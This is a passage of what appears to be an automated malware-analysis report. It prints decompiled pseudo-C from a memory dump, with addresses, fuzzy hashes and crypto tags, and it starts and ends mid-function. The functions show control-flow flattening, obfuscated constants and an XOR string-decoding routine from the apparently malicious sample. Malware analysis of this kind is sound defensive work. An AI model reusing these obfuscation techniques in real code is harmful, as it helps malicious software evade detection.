				_v12 = 0x9f69a3;
				_v12 = _v12 + 0xa27e;
				_v12 = _v12 ^ 0x00a5823a;
				_v16 = 0x1c6708;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x0001a596;
				_v24 = 0x145b1e;
				_v24 = _v24 * 3;
				_v24 = _v24 + 0xffff10a4;
				_v24 = _v24 ^ 0x003e15bb;
				_v28 = 0xa01766;
				_v28 = _v28 + 0xeedd;
				_v28 = _v28 + 0xc1c3;
				_v28 = _v28 ^ 0x00ae4b4b;
				_v20 = 0x11ecfd;
				_v20 = _v20 | 0xf092b0b2;
				_v20 = _v20 ^ 0xf09aa1c3;
				_v32 = 0x6262f1;
				_v32 = _v32 ^ 0x16138c4d;
				_v32 = _v32 ^ 0xf699787b;
				_v32 = _v32 ^ 0xced2d1ad;
				_v32 = _v32 ^ 0x2e351f3d;
				_v36 = 0xaba9d9;
				_v36 = _v36 | 0xd782c865;
				_v36 = _v36 * 0x46;
				_v36 = _v36 ^ 0x0a3573d8;
				_v36 = _v36 ^ 0xf33f9048;
				_v4 = 0xc6818a;
				_v4 = _v4 + 0x56b7;
				_v4 = _v4 ^ 0x00cfc910;
				_v40 = 0xeda4ac;
				_v40 = _v40 << 7;
				_v40 = _v40 + 0xffff1dac;
				_v40 = _v40 + 0x3251;
				_v40 = _v40 ^ 0x76d43905;
				do {
					while(_t105 != 0x7bc1f19) {
						if(_t105 == 0x9ed10ef) {
							_t105 = 0xaae8549;
							continue;
						} else {
							if(_t105 == 0xaae8549) {
								_push(_t99);
								_push(_t99);
								_t93 = E1000B8B0();
								_t107 =  &(_t107[2]);
								_t105 = 0xc22609e;
								_t104 = _t104 + _t93;
								continue;
							} else {
								if(_t105 == 0xc22609e) {
									_t99 = _v16;
									_t95 = E10004930(_t99, _v24, _v28, _v20, _t97 + 0x18);
									_t107 =  &(_t107[3]);
									_t105 = 0x7bc1f19;
									_t104 = _t104 + _t95;
									continue;
								}
							}
						}
						goto L9;
					}
					_t99 = _v32;
					_t89 = E10004930(_t99, _v36, _v4, _v40, _t97 + 0x10);
					_t107 =  &(_t107[3]);
					_t105 = 0xdc5e333;
					_t104 = _t104 + _t89;
					L9:
				} while (_t105 != 0xdc5e333);
				return _t104;
			}

0x10008b74
0x10008b77
0x10008b80
0x10008b87
0x10008b8e
0x10008b95
0x10008b9c
0x10008bae
0x10008bb0
0x10008bb2
0x10008bb5
0x10008bbf
0x10008bc3
0x10008bcb
0x10008bd3
0x10008bdb
0x10008be3
0x10008beb
0x10008bf0
0x10008bf8
0x10008c05
0x10008c09
0x10008c11
0x10008c19
0x10008c21
0x10008c29
0x10008c31
0x10008c39
0x10008c41
0x10008c49
0x10008c51
0x10008c59
0x10008c61
0x10008c69
0x10008c71
0x10008c79
0x10008c81
0x10008c8e
0x10008c92
0x10008c9a
0x10008ca2
0x10008caa
0x10008cb2
0x10008cba
0x10008cc2
0x10008cc7
0x10008ccf
0x10008cd7
0x10008cdf
0x10008cdf
0x10008ced
0x10008d3f
0x00000000
0x10008cef
0x10008cf1
0x10008d2c
0x10008d2d
0x10008d2e
0x10008d33
0x10008d36
0x10008d3b
0x00000000
0x10008cf3
0x10008cf9
0x10008d0b
0x10008d0f
0x10008d14
0x10008d17
0x10008d1c
0x00000000
0x10008d1c
0x10008cf9
0x10008cf1
0x00000000
0x10008ced
0x10008d53
0x10008d57
0x10008d5c
0x10008d5f
0x10008d64
0x10008d66
0x10008d66
0x10008d7b

Strings

Q2, xrefs: 10008CCF

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Q2
API String ID: 0-716058474
Opcode ID: 4f9a3cb29531b63ae396b35c117e53d3657f9250de5c60afe393e67a49f31485
Instruction ID: e73f537b5607457976b802721cbb217458e8fabfcd1e64961a439c4cf20ba66c
Opcode Fuzzy Hash: 4f9a3cb29531b63ae396b35c117e53d3657f9250de5c60afe393e67a49f31485
Instruction Fuzzy Hash: D35169B28093059BD384DF21D58584BBBE5FBD8398F414A2CF4D5A6221D7B4CE498F87

Uniqueness

Uniqueness Score: -1.00%

Function 10008650, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10008650(void* __ecx, signed int* __edx) {
				void* _t60;
				signed int _t68;
				unsigned int* _t82;
				signed int _t83;
				signed int _t85;
				signed int _t86;
				signed int _t90;
				unsigned int _t91;
				unsigned int _t92;
				unsigned int* _t97;
				signed int* _t98;
				signed int* _t99;
				unsigned int _t102;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;

				_push( *(_t112 + 0x30));
				_t100 = __edx;
				_push( *(_t112 + 0x30));
				_push( *(_t112 + 0x30));
				_push(__edx);
				E100167B8(_t60);
				 *(_t112 + 0x24) = 0x4b4cbb;
				_t5 = _t100 + 4; // 0x10001518
				_t98 = _t5;
				_t85 = 0x34;
				 *(_t112 + 0x24) =  *(_t112 + 0x24) * 0x5c;
				 *(_t112 + 0x24) =  *(_t112 + 0x24) + 0xe12;
				 *(_t112 + 0x24) =  *(_t112 + 0x24) + 0xffff2152;
				 *(_t112 + 0x24) =  *(_t112 + 0x24) ^ 0x1b05ddd6;
				 *(_t112 + 0x20) = 0xdbcc40;
				 *(_t112 + 0x20) =  *(_t112 + 0x20) + 0x2568;
				 *(_t112 + 0x20) =  *(_t112 + 0x20) * 0x67;
				 *(_t112 + 0x20) =  *(_t112 + 0x20) + 0x2700;
				 *(_t112 + 0x20) =  *(_t112 + 0x20) ^ 0x5874a50d;
				 *(_t112 + 0x2c) = 0xd6a50c;
				 *(_t112 + 0x2c) =  *(_t112 + 0x2c) | 0x3e4356f3;
				 *(_t112 + 0x2c) =  *(_t112 + 0x2c) * 0xd;
				 *(_t112 + 0x2c) =  *(_t112 + 0x2c) ^ 0x30f43401;
				 *(_t112 + 0x28) = 0xd68486;
				 *(_t112 + 0x28) =  *(_t112 + 0x28) / _t85;
				 *(_t112 + 0x28) =  *(_t112 + 0x28) + 0x3c15;
				 *(_t112 + 0x28) =  *(_t112 + 0x28) ^ 0x000e4e5a;
				_t86 =  *__edx;
				_t99 =  &(_t98[1]);
				_t68 =  *_t98 ^ _t86;
				 *(_t112 + 0x30) = _t86;
				 *(_t112 + 0x34) = _t68;
				_t43 = _t68 + 1; // 0xd68487
				_t101 = _t43;
				_t102 =  !=  ? (_t43 & 0xfffffffc) + 4 : _t43;
				_t82 = E100134E7(_t101 & 0x00000003, _t102);
				_t114 = _t112 + 0x1c;
				 *(_t114 + 0x18) = _t82;
				if(_t82 != 0) {
					_t110 = 0;
					_t97 = _t82;
					_t108 =  >  ? 0 :  &(_t99[_t102 >> 2]) - _t99 + 3 >> 2;
					if(_t108 != 0) {
						_t83 =  *(_t114 + 0x20);
						do {
							_t90 =  *_t99;
							_t52 =  &(_t99[1]); // 0x1d72e329
							_t99 = _t52;
							_t91 = _t90 ^ _t83;
							 *_t97 = _t91;
							_t97 =  &(_t97[1]);
							_t92 = _t91 >> 0x10;
							 *((char*)(_t97 - 3)) = _t91 >> 8;
							 *(_t97 - 2) = _t92;
							_t110 = _t110 + 1;
							 *((char*)(_t97 - 1)) = _t92 >> 8;
						} while (_t110 < _t108);
						_t82 =  *(_t114 + 0x1c);
					}
					 *((char*)(_t82 +  *((intOrPtr*)(_t114 + 0x24)))) = 0;
				}
				return _t82;
			}

0x10008656
0x1000865a
0x1000865c
0x10008660
0x10008664
0x10008666
0x1000866b
0x10008673
0x10008673
0x1000867f
0x10008680
0x10008684
0x1000868c
0x10008694
0x1000869c
0x100086a4
0x100086b1
0x100086b5
0x100086bd
0x100086c5
0x100086cd
0x100086da
0x100086de
0x100086e6
0x100086f4
0x100086f8
0x10008700
0x10008708
0x1000870c
0x1000870f
0x10008711
0x10008715
0x10008719
0x10008719
0x10008729
0x10008746
0x10008748
0x1000874b
0x10008751
0x10008759
0x1000875b
0x1000876c
0x10008771
0x10008773
0x10008777
0x10008777
0x10008779
0x10008779
0x1000877c
0x1000877e
0x10008785
0x10008788
0x1000878b
0x1000878e
0x10008794
0x10008795
0x10008798
0x1000879c
0x1000879c
0x100087a5
0x100087a5
0x100087b1

Strings

h%, xrefs: 100086A4

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: h%
API String ID: 0-2818123543
Opcode ID: 66cc7b88b51dc018f31926baa72f98865988e4b0b8677f998727577a13cf5b99
Instruction ID: be8e820ad49795de1b1795b9fffbc2c95a365ee3db1231bd85ba127b945280ea
Opcode Fuzzy Hash: 66cc7b88b51dc018f31926baa72f98865988e4b0b8677f998727577a13cf5b99
Instruction Fuzzy Hash: 7B415872A093418BC304CF29C88584AFBE0FBC8718F454B6DE489A7251D374EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1000CADE, Relevance: 1.4, Strings: 1, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000CADE() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				void* _t77;
				signed int _t88;
				signed int _t89;
				intOrPtr _t91;
				signed int* _t93;

				_t93 =  &_v352;
				_v328 = 0xa97820;
				_t91 = 0;
				_t77 = 0x67b20b1;
				_v324 = 0;
				_v340 = 0x14d0e7;
				_v340 = _v340 | 0xa153d1d5;
				_v340 = _v340 >> 3;
				_v340 = _v340 ^ 0x1422519c;
				_v352 = 0xae3fbf;
				_v352 = _v352 | 0xb1444259;
				_v352 = _v352 >> 0xb;
				_t88 = 0xd;
				_v352 = _v352 / _t88;
				_v352 = _v352 ^ 0x0001f6ae;
				_v344 = 0x2a13cf;
				_v344 = _v344 + 0xffff7279;
				_v344 = _v344 << 0xa;
				_v344 = _v344 ^ 0xa6132469;
				_v332 = 0x25f44f;
				_v332 = _v332 | 0x2c3e672a;
				_v332 = _v332 ^ 0x2c34f0e2;
				_v348 = 0x2500d1;
				_v348 = _v348 + 0xffffa3b8;
				_v348 = _v348 | 0x1f8ccfc8;
				_v348 = _v348 ^ 0x1faa0651;
				_v336 = 0x8b00fd;
				_t89 = 0x41;
				_v336 = _v336 / _t89;
				_v336 = _v336 ^ 0x000283bf;
				do {
					while(_t77 != 0x2120ef0) {
						if(_t77 == 0x2b11a9c) {
							_t91 = _t91 + (_v320 & 0x0000ffff);
						} else {
							if(_t77 == 0x57ac7d3) {
								_t77 = 0x2b11a9c;
								_t91 = _t91 + _v276 * 0x64;
								continue;
							} else {
								if(_t77 == 0x67b20b1) {
									_t77 = 0x2120ef0;
									continue;
								} else {
									if(_t77 == 0x69b3f23) {
										E10019CF6(_v348, _v336,  &_v320);
										_t77 = 0xfd6c33e;
										continue;
									} else {
										if(_t77 == 0xdeb7d1b) {
											_t77 = 0x57ac7d3;
											_t91 = _t91 + _v280 * 0x3e8;
											continue;
										} else {
											if(_t77 != 0xfd6c33e) {
												goto L14;
											} else {
												_t77 = 0xdeb7d1b;
												_t91 = _t91 + (_v2 & 0x000000ff) * 0x186a0;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t91;
					}
					_v284 = 0x11c;
					E1001CE5E( &_v284, _v340, _v352, _v344, _v332);
					_t93 =  &(_t93[3]);
					_t77 = 0x69b3f23;
					L14:
				} while (_t77 != 0x79b8977);
				goto L17;
			}

0x1000cade
0x1000cae4
0x1000caf1
0x1000caf3
0x1000caf8
0x1000cb01
0x1000cb0e
0x1000cb16
0x1000cb1b
0x1000cb23
0x1000cb2b
0x1000cb33
0x1000cb3f
0x1000cb44
0x1000cb4a
0x1000cb52
0x1000cb5a
0x1000cb62
0x1000cb67
0x1000cb6f
0x1000cb77
0x1000cb7f
0x1000cb87
0x1000cb8f
0x1000cb97
0x1000cb9f
0x1000cba7
0x1000cbb3
0x1000cbbb
0x1000cbbf
0x1000cbc7
0x1000cbc7
0x1000cbcd
0x1000cc81
0x1000cbd3
0x1000cbd5
0x1000cc3f
0x1000cc41
0x00000000
0x1000cbd7
0x1000cbdd
0x1000cc36
0x00000000
0x1000cbdf
0x1000cbe5
0x1000cc29
0x1000cc2f
0x00000000
0x1000cbe7
0x1000cbed
0x1000cc16
0x1000cc18
0x00000000
0x1000cbef
0x1000cbf5
0x00000000
0x1000cbf7
0x1000cbff
0x1000cc0a
0x00000000
0x1000cc0a
0x1000cbf5
0x1000cbed
0x1000cbe5
0x1000cbdd
0x1000cbd5
0x1000cc84
0x1000cc8f
0x1000cc8f
0x1000cc4d
0x1000cc61
0x1000cc66
0x1000cc69
0x1000cc6e
0x1000cc6e
0x00000000

Strings

*g>,, xrefs: 1000CB77

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: *g>,
API String ID: 0-3494787709
Opcode ID: bb5ae219bacd8982df5d3777e3d2e2e87abbdfbe67ac4d3a58af0c12f6b072b6
Instruction ID: 8ecd58e8c634513dae69df602d4581084c2da11999cd80576e0b05c0d6a80b75
Opcode Fuzzy Hash: bb5ae219bacd8982df5d3777e3d2e2e87abbdfbe67ac4d3a58af0c12f6b072b6
Instruction Fuzzy Hash: A341BF725083858BE758CF11C49586FFBE1EBD4398F20892DF98A57265C771CA888F83

Uniqueness

Uniqueness Score: -1.00%

Function 100165CD, Relevance: 1.3, Strings: 1, Instructions: 89
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E100165CD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t88;
				intOrPtr* _t89;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				intOrPtr _t109;

				_v24 = 0x22ce21;
				_t92 = 0x42;
				_v24 = _v24 * 0x1a;
				_v24 = _v24 ^ 0x0385f04d;
				_v12 = 0xa78470;
				_t93 = 0x3d;
				_v12 = _v12 / _t92;
				_v12 = _v12 / _t93;
				_v12 = _v12 ^ 0x00036110;
				_v8 = 0xaa4cd9;
				_v8 = _v8 + 0xffff9db9;
				_v8 = _v8 | 0xbb198af3;
				_v8 = _v8 ^ 0xbbb2c038;
				_v20 = 0x52e91d;
				_t94 = 0x38;
				_t109 = _a4;
				_push(0);
				_push(1);
				_v20 = _v20 * 0x18;
				_v20 = _v20 ^ 0x07cb76fd;
				_v32 = 0x4649f3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x002f9c57;
				_v28 = 0x80e31e;
				_v28 = _v28 / _t94;
				_v28 = _v28 ^ 0x000e25b4;
				_v16 = 0x72797c;
				_v16 = _v16 + 0xffffb2a9;
				_v16 = _v16 ^ 0xb72371f4;
				_v16 = _v16 ^ 0xb756e3a2;
				_v40 = 0xd328;
				_v40 = _v40 * 0x6b;
				_v40 = _v40 ^ 0x005b1ca6;
				_v36 = 0xe21df7;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x388747c9;
				_push( *((intOrPtr*)(_t109 + 0x14)));
				if( *((intOrPtr*)(_t109 + 0x10))() != 0) {
					_push(_v20);
					_push(_v8);
					_push(_v12);
					_t88 = E10008650(_v24, 0x100016e4);
					_push(_v28);
					_t111 = _t88;
					_push(_t88);
					_t89 = E100062D9( *((intOrPtr*)(_t109 + 0x14)), _v32);
					if(_t89 != 0) {
						 *_t89();
					}
					E1000B952(_v16, _t111, _v40, _v36);
				}
				return 0;
			}

0x100165d3
0x100165e3
0x100165e6
0x100165e9
0x100165f0
0x100165fc
0x100165fd
0x10016609
0x1001660e
0x10016615
0x1001661c
0x10016623
0x1001662a
0x10016631
0x1001663c
0x1001663d
0x10016640
0x10016642
0x10016644
0x10016647
0x1001664e
0x10016655
0x10016658
0x1001665f
0x1001666b
0x1001666e
0x10016675
0x1001667c
0x10016683
0x1001668a
0x10016691
0x1001669c
0x1001669f
0x100166a6
0x100166ad
0x100166b1
0x100166b8
0x100166c0
0x100166c3
0x100166cb
0x100166ce
0x100166d4
0x100166d9
0x100166df
0x100166e4
0x100166e5
0x100166ef
0x100166f1
0x100166f1
0x100166fe
0x10016705
0x1001670c

Strings

|yr, xrefs: 10016675

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: |yr
API String ID: 0-3797719689
Opcode ID: 26f90735986b90f265933f040824e160552350fca1477e8c413729afb7977ccc
Instruction ID: ee6201add34afaf53a17c1a812b255b6b8aead8c3ee86c45df24b33d7c4a5eb0
Opcode Fuzzy Hash: 26f90735986b90f265933f040824e160552350fca1477e8c413729afb7977ccc
Instruction Fuzzy Hash: 264133B1D01209AFDF08CFA5D9069EEBFB1FB45344F20819AE501B7290D7B56A84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 100088FC, Relevance: 1.3, Strings: 1, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E100088FC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t81;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				signed int _t104;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E100167B8(_t81);
				_v16 = 0x959514;
				_v16 = _v16 ^ 0x3c3c2305;
				_v16 = _v16 ^ 0x3caf394b;
				_v8 = 0x2a5179;
				_t100 = 0x45;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 + 0x743;
				_v8 = _v8 * 0x73;
				_v8 = _v8 ^ 0xaeea30c2;
				_v8 = 0x94e3b5;
				_v8 = _v8 | 0xbbad6bd6;
				_v8 = _v8 + 0xffff9c4b;
				_v8 = _v8 ^ 0xbbb00dad;
				_v12 = 0xada5fe;
				_v12 = _v12 / _t100;
				_v12 = _v12 ^ 0x44874347;
				_v12 = _v12 ^ 0x448eaaf2;
				_v8 = 0xca623e;
				_v8 = _v8 << 7;
				_t101 = 0x43;
				_v8 = _v8 / _t101;
				_t102 = 0x21;
				_v8 = _v8 / _t102;
				_v8 = _v8 ^ 0x0001e37e;
				_v8 = 0x7e789f;
				_v8 = _v8 | 0x26b9f197;
				_t103 = 0x44;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x64;
				_v8 = _v8 ^ 0x395b327f;
				_v12 = 0x382d87;
				_v12 = _v12 / _t104;
				_v12 = _v12 + 0xfe33;
				_v12 = _v12 ^ 0x000d4efc;
				return E1001E074(_v8, _t104, E10012271(), _a12);
			}

0x10008902
0x10008905
0x10008908
0x1000890c
0x1000890d
0x10008912
0x1000891c
0x10008925
0x1000892c
0x10008939
0x1000893c
0x1000893f
0x1000894a
0x1000894d
0x10008954
0x1000895b
0x10008962
0x10008969
0x10008970
0x1000897e
0x10008981
0x10008988
0x1000898f
0x10008996
0x1000899d
0x100089a2
0x100089aa
0x100089af
0x100089b4
0x100089bb
0x100089c2
0x100089cc
0x100089d1
0x100089da
0x100089db
0x100089de
0x100089e5
0x100089f1
0x100089f4
0x100089fb
0x10008a20

Strings

yQ*, xrefs: 1000892C

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: yQ*
API String ID: 0-3698994958
Opcode ID: 13716de46512e3139a486220577b3180cfaa6b961720ad377fc828e9e84de4a7
Instruction ID: cbf7647c17a1bfe9b276345ded1c20bca989c05753125f0547f996a3495f7543
Opcode Fuzzy Hash: 13716de46512e3139a486220577b3180cfaa6b961720ad377fc828e9e84de4a7
Instruction Fuzzy Hash: 3E31F0B5D02208FFDF08CFA4DA4A98DBBB2FB54304F20C099E505AB260E7B55B54AF00

Uniqueness

Uniqueness Score: -1.00%

Function 1001EB0F, Relevance: 1.3, Strings: 1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1001EB0F(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _t96;
				signed int _t97;

				_v28 = 0x27bbdb;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x7bb3a9f3;
				_v20 = 0x506046;
				_v20 = _v20 ^ 0x5cf06109;
				_v20 = _v20 + 0x72c8;
				_v20 = _v20 ^ 0x5ca7cd80;
				_v16 = 0xef6cbc;
				_v16 = _v16 | 0x6ce5b6b4;
				_v16 = _v16 ^ 0x1940ef56;
				_v16 = _v16 ^ 0x75a82fdd;
				_v24 = 0xedd105;
				_v24 = _v24 ^ 0x8a16f5aa;
				_v24 = _v24 ^ 0x8af7b6ba;
				_v8 = 0xa91a8f;
				_v8 = _v8 | 0xf1342028;
				_v8 = _v8 + 0xca31;
				_v8 = _v8 + 0xffff75ea;
				_v8 = _v8 ^ 0xf1bfb3ed;
				_v36 = 0x9e3b55;
				_t96 = __edx;
				_t97 = 0x4d;
				_v36 = _v36 / _t97;
				_v36 = _v36 ^ 0x00004adc;
				_v32 = 0x4d9e9a;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0xd9e8289c;
				_v44 = 0x4d85a4;
				_v44 = _v44 + 0xffffc2e1;
				_v44 = _v44 ^ 0x0041b759;
				_v40 = 0xa0793a;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0x03c2975b;
				_v12 = 0xc86df0;
				_v12 = _v12 + 0xffffaed7;
				_v12 = _v12 + 0xfffff66e;
				_v12 = _v12 + 0x9f65;
				_v12 = _v12 ^ 0x00c885fd;
				_push(_v24);
				_push(_v16);
				_push(_v20);
				 *((intOrPtr*)( *0x10025210 + 0x18 + _t96 * 4)) = E1001FA2B(_v8, E1000416C(_v28, __ecx), _v36, _v32);
				return E1000B952(_v44, _t82, _v40, _v12);
			}

0x1001eb15
0x1001eb1c
0x1001eb20
0x1001eb27
0x1001eb2e
0x1001eb35
0x1001eb3c
0x1001eb43
0x1001eb4a
0x1001eb51
0x1001eb58
0x1001eb5f
0x1001eb66
0x1001eb6d
0x1001eb74
0x1001eb7b
0x1001eb82
0x1001eb89
0x1001eb90
0x1001eb97
0x1001eba5
0x1001eba9
0x1001ebae
0x1001ebb1
0x1001ebb8
0x1001ebbf
0x1001ebc3
0x1001ebca
0x1001ebd1
0x1001ebd8
0x1001ebdf
0x1001ebe6
0x1001ebea
0x1001ebf1
0x1001ebf8
0x1001ebff
0x1001ec06
0x1001ec0d
0x1001ec14
0x1001ec17
0x1001ec1a
0x1001ec45
0x1001ec59

Strings

F`P, xrefs: 1001EB27

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: F`P
API String ID: 0-2243957299
Opcode ID: ce8cd51e7bfde41d03521ae57834c694b66842ad7cb82dc304724f052f407afe
Instruction ID: 60274ff38dca0d3298d7e73ba3e4103b5801d31c2156820651f197f4d79fe318
Opcode Fuzzy Hash: ce8cd51e7bfde41d03521ae57834c694b66842ad7cb82dc304724f052f407afe
Instruction Fuzzy Hash: 9E3112B1D00219EBCF55DFE1C84A4EEBFB1FB44314F208099D526B6260D7B91A56CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10017679, Relevance: .2, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10017679(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t126;
				intOrPtr _t150;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				void* _t160;
				void* _t178;
				void* _t179;
				void* _t181;
				void* _t182;

				_push(_a16);
				_t178 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t126);
				_v28 = 0xd8720f;
				_t182 = _t181 + 0x18;
				_t179 = 0;
				_t160 = 0x9bc03c0;
				_t152 = 0x78;
				_v28 = _v28 / _t152;
				_v28 = _v28 ^ 0xac02ba02;
				_v28 = _v28 ^ 0xac0c77c0;
				_v44 = 0xd63788;
				_t153 = 0x5b;
				_v44 = _v44 / _t153;
				_v44 = _v44 ^ 0xd7c7fbd9;
				_v44 = _v44 ^ 0x1e1932bc;
				_v44 = _v44 ^ 0xc9d5cb4b;
				_v48 = 0xbe1d34;
				_t154 = 0x4c;
				_v48 = _v48 / _t154;
				_t155 = 0x5d;
				_v48 = _v48 / _t155;
				_v48 = _v48 | 0x5d53a4d4;
				_v48 = _v48 ^ 0x5d5c8941;
				_v32 = 0x3b0002;
				_v32 = _v32 + 0xfd7b;
				_t156 = 0x61;
				_v32 = _v32 / _t156;
				_v32 = _v32 ^ 0x000bbfc3;
				_v40 = 0x5f0fae;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_t157 = 0x47;
				_v40 = _v40 * 6;
				_v40 = _v40 ^ 0x2f0e6887;
				_v16 = 0xc06176;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x003df380;
				_v20 = 0x5a51bf;
				_v20 = _v20 / _t157;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00078084;
				_v24 = 0x87b476;
				_v24 = _v24 + 0xbab3;
				_v24 = _v24 * 0x1c;
				_v24 = _v24 ^ 0x0ee847dc;
				_v4 = 0x57fe68;
				_v4 = _v4 + 0x922c;
				_v4 = _v4 ^ 0x00508ece;
				_v8 = 0x19a2b1;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x00644c1b;
				_v36 = 0x84c3b7;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 | 0xd8c32a77;
				_v36 = _v36 ^ 0xbe4f307c;
				_v36 = _v36 ^ 0x668fbcf3;
				_v12 = 0xfb325e;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0007f497;
				do {
					while(_t160 != 0x249693f) {
						if(_t160 == 0x554afd4) {
							E10011E60();
							_t160 = 0x88b3abf;
							continue;
						} else {
							if(_t160 == 0x88b3abf) {
								E100088FC(_v4, _v8, _v36, _v12,  *0x10025214);
							} else {
								if(_t160 == 0x9bc03c0) {
									_push(_t160);
									_t150 = E100134E7(_t160, 0x4c);
									_t182 = _t182 + 0xc;
									 *0x10025214 = _t150;
									_t160 = 0x9f1eec2;
									continue;
								} else {
									if(_t160 != 0x9f1eec2) {
										goto L12;
									} else {
										if(E1000A6F7() != 0) {
											_t160 = 0x249693f;
											continue;
										}
									}
								}
							}
						}
						L15:
						return _t179;
					}
					_t179 = E100167B9(_v40, _v16, _v20, _v24, _a8, _t178);
					_t182 = _t182 + 0x10;
					if(_t179 == 0) {
						_t160 = 0x554afd4;
						goto L12;
					}
					goto L15;
					L12:
				} while (_t160 != 0x6efbf68);
				goto L15;
			}

0x10017680
0x10017684
0x10017686
0x1001768a
0x1001768e
0x10017692
0x10017693
0x10017694
0x10017699
0x100176a1
0x100176aa
0x100176ac
0x100176b3
0x100176b8
0x100176be
0x100176c6
0x100176ce
0x100176da
0x100176df
0x100176e5
0x100176ed
0x100176f5
0x100176fd
0x10017709
0x1001770e
0x10017718
0x1001771d
0x10017723
0x1001772b
0x10017733
0x1001773b
0x10017747
0x1001774c
0x10017752
0x1001775a
0x10017762
0x10017767
0x10017771
0x10017772
0x10017776
0x1001777e
0x10017786
0x1001778b
0x10017793
0x100177a1
0x100177a5
0x100177aa
0x100177b2
0x100177ba
0x100177c7
0x100177cb
0x100177d3
0x100177e0
0x100177ed
0x100177f5
0x100177fd
0x10017802
0x1001780a
0x10017812
0x10017817
0x1001781f
0x10017827
0x1001782f
0x10017837
0x1001783c
0x10017844
0x10017844
0x1001784a
0x100178a1
0x100178a6
0x00000000
0x1001784c
0x10017852
0x100178f6
0x10017858
0x1001785e
0x10017889
0x1001788d
0x10017892
0x10017895
0x1001789a
0x00000000
0x10017860
0x10017866
0x00000000
0x10017868
0x1001786f
0x10017875
0x00000000
0x10017875
0x1001786f
0x10017866
0x1001785e
0x10017852
0x100178ff
0x10017907
0x10017907
0x100178c7
0x100178c9
0x100178ce
0x100178d0
0x00000000
0x100178d0
0x00000000
0x100178d2
0x100178d2
0x00000000

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ee5085bff0b26aab67a85ac9d9cb7bb7df1d148168a099b194ee8467436ddd
Instruction ID: 3563fe5a1773f50104ed3f2576bfceee7d43ee6b494a414088f66fc94259bd7d
Opcode Fuzzy Hash: 58ee5085bff0b26aab67a85ac9d9cb7bb7df1d148168a099b194ee8467436ddd
Instruction Fuzzy Hash: B46165716083409FC344CF21C88991BBBF1FBD8758F508A1DF58A9A261C7B6CA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10022EA4, Relevance: .1, Instructions: 148
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E10022EA4() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
